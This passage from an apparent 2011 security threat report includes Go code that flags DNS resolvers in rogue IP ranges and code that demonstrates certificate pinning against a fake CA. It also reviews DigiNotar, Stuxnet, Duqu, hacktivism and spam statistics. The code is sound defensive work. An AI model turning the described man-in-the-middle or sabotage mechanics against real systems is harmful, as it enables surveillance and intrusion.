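	"77.67.83.0/24",   // 77.67.83.0 - 77.67.83.255
	"213.109.64.0/20", // 213.109.64.0 - 213.109.79.255
	"64.28.176.0/20",  // 64.28.176.0 - 64.28.191.255
}

var ipv4Re = regexp.MustCompile(`\b(?:\d{1,3}\.){3}\d{1,3}\b`)

// ExtractResolvers pulls IPv4 resolver addresses out of either a Unix
// /etc/resolv.conf ("nameserver 1.2.3.4") or the "DNS Servers" block of
// Windows "ipconfig /all" output, where extra servers follow on indented
// continuation lines that carry nothing but an address.
func ExtractResolvers(config string) []string {
	var out []string
	inDNSBlock := false
	sc := bufio.NewScanner(strings.NewReader(config))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		switch {
		case strings.HasPrefix(line, "nameserver"):
			inDNSBlock = false
			out = append(out, ipv4Re.FindAllString(line, -1)...)
		case strings.Contains(line, "DNS Servers"):
			inDNSBlock = true
			out = append(out, ipv4Re.FindAllString(line, -1)...)
		case inDNSBlock && !strings.Contains(line, ":") && ipv4Re.MatchString(line):
			out = append(out, ipv4Re.FindAllString(line, -1)...)
		default:
			inDNSBlock = false
		}
	}
	return out
}

// FlagRogue returns the resolvers that fall inside any of the given CIDR
// ranges. A malformed CIDR is an error; unparsable resolver strings are skipped.
func FlagRogue(resolvers, cidrs []string) ([]string, error) {
	nets := make([]*net.IPNet, 0, len(cidrs))
	for _, c := range cidrs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			return nil, fmt.Errorf("bad CIDR %q: %w", c, err)
		}
		nets = append(nets, n)
	}
	var flagged []string
	for _, r := range resolvers {
		ip := net.ParseIP(r)
		if ip == nil {
			continue
		}
		for _, n := range nets {
			if n.Contains(ip) {
				flagged = append(flagged, r)
				break
			}
		}
	}
	return flagged, nil
}

func main() {
	// Constructed sample of ipconfig /all output from a host whose primary
	// resolver has been rewritten to a rogue address.
	sample := `Windows IP Configuration

   DNS Servers . . . . . . . . . . . : 85.255.112.50
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled`
	resolvers := ExtractResolvers(sample)
	rogue, err := FlagRogue(resolvers, RogueCIDRs)
	if err != nil {
		panic(err)
	}
	fmt.Printf("configured resolvers: %v\nrogue resolvers: %v\n", resolvers, rogue)
}
```

The check is only as good as its range list, so the same function should be run against the resolvers a home router hands out over DHCP as well as the ones set on the PC, since the same malware family also rewrote router settings; a machine that shows clean resolvers locally can still be sent to a rogue server by its router.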

5. It's Not Just About the Money

In the previous section, Cybercrime and You, it was said that cybercriminals have only one thing on their minds: separating their victims from their money. But what happens when an attack is state sponsored, or the instigators have something else in mind? What if they simply have a message they want to get out? Several occurrences during 2011 made the IT security community stand up and take notice. Computers are powerful tools, and the fact that entire countries, their economies and their militaries depend on them, and on them being connected, makes them even more powerful tools in this day and age. Here are a few events from 2011 that help paint this picture.

5b. DigiNotar

Thanks to a breach of the certificate authority DigiNotar's systems earlier in the year, attackers were able to create fraudulent SSL certificates in this once-trusted company's name. The certificates were made out for Google domains and designed to trick web browsers into believing they were talking to the legitimate Google sites when in reality the users were victims of a man-in-the-middle attack. The attacker would present a fake certificate to people attempting to reach Google services such as Gmail; because it chained to a certificate authority the browser trusted, the victim's browser accepted it and connected, believing it was talking to Google. Once that connection was made, the attacker forwarded the requests on to the real Google site, positioning itself between the two ends of the conversation and able to monitor every exchange in both directions.

The attack was used to eavesdrop on more than 300,000 Iranian users via their Gmail accounts. Interestingly, Iran's own government was suspected as the attacker, supposedly keeping tabs on activists and protesters. Fox-IT, the company that did the majority of the research into the breach, reported that of the 300,000-plus IP addresses that checked the validity of the fake certificate, over 99% were in Iran, making those users the obvious target of a directed attack.

Google wasn't the only domain falsified. According to the researchers, over 500 fake certificates were issued, and possibly abused, during the several weeks that DigiNotar was breached before it realized it. DigiNotar has since filed for bankruptcy after all of the major browser vendors removed it from their trusted certificate lists.
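The weakness the paragraphs above describe is structural: a browser of the time accepted any certificate that chained to any of its trusted roots, so a certificate from a compromised but still trusted CA looked exactly like one from Google's real issuer. What caught the DigiNotar certificate in the field was Chrome's built-in public-key pinning for Google domains, which adds a second question: does the validated chain contain a key we expect? The following added example (written for this page; not Google's, Fox-IT's or DigiNotar's code) builds that situation in Go's standard library with two self-signed roots, the hypothetical "Legit Root CA" and "Compromised Root CA", issues a certificate for mail.google.com from each, and shows that plain chain validation accepts both while an SPKI pin check rejects the rogue one.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/base64"
	"fmt"
	"math/big"
	"time"
)

// Identity is a certificate together with the private key that signs for it.
type Identity struct {
	Cert *x509.Certificate
	Key  *ecdsa.PrivateKey
}

func check(err error) {
	if err != nil {
		panic(err)
	}
}

// issue generates a key pair and a certificate for it: a self-signed CA called
// name when parent is nil, otherwise a server certificate for host name signed by parent.
func issue(name string, parent *Identity) Identity {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	check(err)
	tmpl := &x509.Certificate{
		Subject:   pkix.Name{CommonName: name},
		NotBefore: time.Now().Add(-time.Hour),
		NotAfter:  time.Now().Add(24 * time.Hour),
	}
	tmpl.SerialNumber, err = rand.Int(rand.Reader, big.NewInt(1<<62))
	check(err)
	parentCert, signer := tmpl, key // self-signed unless a parent is given
	if parent == nil {
		tmpl.IsCA, tmpl.BasicConstraintsValid = true, true
		tmpl.KeyUsage = x509.KeyUsageCertSign | x509.KeyUsageDigitalSignature
	} else {
		tmpl.DNSNames = []string{name}
		tmpl.KeyUsage = x509.KeyUsageDigitalSignature
		tmpl.ExtKeyUsage = []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}
		parentCert, signer = parent.Cert, parent.Key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parentCert, &key.PublicKey, signer)
	check(err)
	cert, err := x509.ParseCertificate(der)
	check(err)
	return Identity{Cert: cert, Key: key}
}

// SPKIPin is the base64 SHA-256 of a certificate's SubjectPublicKeyInfo, the
// pin format used by HPKP and by Chrome's built-in pins.
func SPKIPin(c *x509.Certificate) string {
	sum := sha256.Sum256(c.RawSubjectPublicKeyInfo)
	return base64.StdEncoding.EncodeToString(sum[:])
}

// Accept performs the 2011 browser check (any chain to a trusted root whose leaf
// names host) and, when pins is non-empty, also requires a pinned key in that chain.
func Accept(leaf *x509.Certificate, roots *x509.CertPool, host string, pins map[string]bool) error {
	chains, err := leaf.Verify(x509.VerifyOptions{Roots: roots, DNSName: host})
	if err != nil {
		return err
	}
	if len(pins) == 0 {
		return nil
	}
	for _, chain := range chains {
		for _, c := range chain {
			if pins[SPKIPin(c)] {
				return nil
			}
		}
	}
	return fmt.Errorf("chain validated, but no certificate in it matches a pinned key")
}

// BuildScenario models the DigiNotar situation: two roots in the trust store (the
// real issuer and a compromised but still trusted CA) with a pin for the real one only.
func BuildScenario(host string) (roots *x509.CertPool, pins map[string]bool, legitLeaf, rogueLeaf *x509.Certificate) {
	legit, rogue := issue("Legit Root CA", nil), issue("Compromised Root CA", nil) // hypothetical CA names
	roots = x509.NewCertPool()
	roots.AddCert(legit.Cert)
	roots.AddCert(rogue.Cert)
	pins = map[string]bool{SPKIPin(legit.Cert): true}
	return roots, pins, issue(host, &legit).Cert, issue(host, &rogue).Cert
}

func main() {
	roots, pins, legit, rogue := BuildScenario("mail.google.com")
	fmt.Println("rogue cert, chain validation only:", Accept(rogue, roots, "mail.google.com", nil))
	fmt.Println("legit cert, chain plus pins:      ", Accept(legit, roots, "mail.google.com", pins))
	fmt.Println("rogue cert, chain plus pins:      ", Accept(rogue, roots, "mail.google.com", pins))
}
```

The pin is taken over the issuing CA's public key rather than the leaf's, which is how Chrome's Google pins worked: any chain is fine as long as some certificate in it carries an expected key, so routine leaf renewals do not break the client, but a certificate minted by a different CA, however trusted, does.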

5c. Malware on a Mission

One of the biggest stories to hit the community was the discovery of Stuxnet. Stuxnet was actually discovered in June of 2010, but details of its true intent were not worked out until 2011 because of its highly specialized code. Stuxnet turned out to have a very specific mission: it spread as a worm until it found Siemens industrial control (SCADA) software and the programmable logic controllers (PLCs) that software manages. Different variants of Stuxnet found their way into five Iranian facilities connected with uranium enrichment. Getting into those facilities at all was a remarkable first feat, as their networks were air-gapped, meaning they had no outside connections for the worm to travel over. That also means the worm was most likely carried in by workers, possibly on infected thumb drives. Once inside, Stuxnet sought out the machines that monitored and controlled the PLCs operating the enrichment centrifuges. It altered the centrifuges' rotation speed at critical times in order to sabotage the enrichment process, and it falsified the readings reported back to the monitoring software so the change would never be noticed.

Later, in September of 2011, another piece of malware was found on the Internet. This one was called Duqu, and it gained quick notoriety because it shared some code with Stuxnet. Duqu arrived as Microsoft Word documents sent to what appeared to be carefully chosen targets in eight countries. Once opened, the documents exploited a vulnerability in the Windows kernel's TrueType font parsing code (win32k.sys, CVE-2011-3402) rather than in Word itself; the document merely delivered the malicious font. Duqu's ultimate goal has not yet been made public.

5d. Hacktivism

A lot of people on the Internet began following LulzSec and even siding with them, as if they were a sort of Robin Hood of the Internet, because they pointed out that big corporations and big government were not protecting sensitive information to the degree they should. The trouble is that in doing so they exposed the private information of hundreds of thousands of otherwise innocent people who had nothing to do with their "cause". It is one thing to point out security flaws in a proper, ethical manner; this was another.

Yet another group of hackers made quick headlines in September. They called themselves the "Script Kiddies". Script kiddie is a term for people who don't know enough about coding or hacking to create attacks on their own, and instead take scripts written by others and run them as if they did. It is usually an insult aimed at the "noobs" of the craft, but this group adopted the name deliberately, and just as their namesakes annoy people who know what they are doing, this group created plenty of annoyance for a while. The group first came to light when it broke into the Facebook account of the drug company Pfizer, defaced it, and took credit on a newly created Twitter account. On September 9th it broke into the NBC News Twitter account and began posting tweets that another terrorist attack was under way at the Ground Zero site, just two days before the 10th anniversary of the 9/11 attacks, then changed the account to read "Hacked by Script Kiddies". Since then the group has also hacked the Wall Street Journal's Twitter account, where it asked people to vote on which entity it should hack next, very much in the boasting style of the recently defunct LulzSec. The group has also claimed responsibility for an earlier Twitter breach back in July, that of Fox News, where it posted several tweets claiming that Barack Obama had died. These groups are almost certainly drawing their courage from the infamy of the LulzSec and Anonymous "hacktivism" attacks, but they may want to note that those people are being caught and jailed left and right.

Finally, another group that made consistent headlines in 2011 was the one known simply as Anonymous. Anonymous is known for its use of the Guy Fawkes mask and for rallying supporters to help DDoS (distributed denial of service) targets it has some disagreement with. Initially the group seemed to consist of many subsets that all felt part of the whole, some more aggressive than others, but it appears to have acquired some leadership and is quick to call out people making claims in its name who are not actually part of the Anonymous movement. Its main cause now seems to be protest, a sort of cyber civil disobedience. Anonymous played a big part in rallying people to the Occupy Wall Street movement.

6. Total Email Traffic Volume

The first chart below represents both total and spam traffic throughout the past twelve months, and the second chart represents spam messages as a percentage of total email traffic. While spam traffic dipped in mid-year, it has been on the rise throughout Q4 of 2011. In the past year we processed 37.5 billion messages, of which 33.4 billion were spam.

In the past year spam traffic accounted for (on average) 88.8 percent of all email traffic.

7. Tests Failed

This chart represents the number of times messages failed various tests over the past 12 months. Keep in mind that many messages failed multiple tests; hence the total from these charts will surpass the total individual pieces of spam seen during the period.

8. Regions of Origin

This graph represents both spam and malicious email traffic by region. In 2011, Asia overtook Europe as the top spam producing region.

9. Top Ten Countries of Origin

This chart represents the top countries from which spam originated during the past 12 months. Once again the United States reigned supreme as the top country for spam origination. For the first time we also saw the UK fall out of the top ten.

10. Top Email-Delivered Viral Threats

These are the top 20 malware threats we saw over the past twelve months, in order of frequency, with the most frequent in the top position. Virus names that begin with "X." signify rules written by AppRiver analysts. (This does not mean that other anti-virus vendors never had definitions in place for these viruses; it simply means that AppRiver often had protection in place before many of them did.)

  • X.W32.Sasfis.pak
  • X.UPX.App.pakuber
  • X.W32.Kryptik.CTR.pak
  • X.W32.PX.pakc
  • X.W32.PX.pakb
  • X.W32.Kryp.farca
  • X.UPX.App.pakuberb
  • X.W32.PECxt.a
  • X.Troj\Invo-Zipreport.ks
  • X.W32.Kazy.pak
  • X.Troj\Invo-Zip.9.14repor
  • X.W32.Crypt.ZPACK.Genb
  • X.W32\docPak
  • X.W32.Kryp.1115
  • X.Troj\Zipreport.ndg20110
  • X.W32.Dropper.Pij.gen
  • X.W32\Kryptik.RZB.ACh
  • X.Trojanmypic.zip.5.15JRa
  • X.Hiden.Troj.ndg1114a
  • X.Troj\FakeAV-ENL.ac

11. Twelve-Month Virus Activity

This chart represents email-borne viruses as seen inbound to our filters. There were some very concerning spikes in virus traffic this year. August and September brought some of the largest single-day spikes we have seen to date; on some days virus traffic reached 25 percent of all message traffic. During the past year we quarantined over 670 million email-borne viruses.

12. Image Spam

The chart below represents total image spam seen by AppRiver filters during the past 12 months. This obfuscation method, in which the spam content is placed inside an image so that text-based filters cannot read it, remained level throughout the year.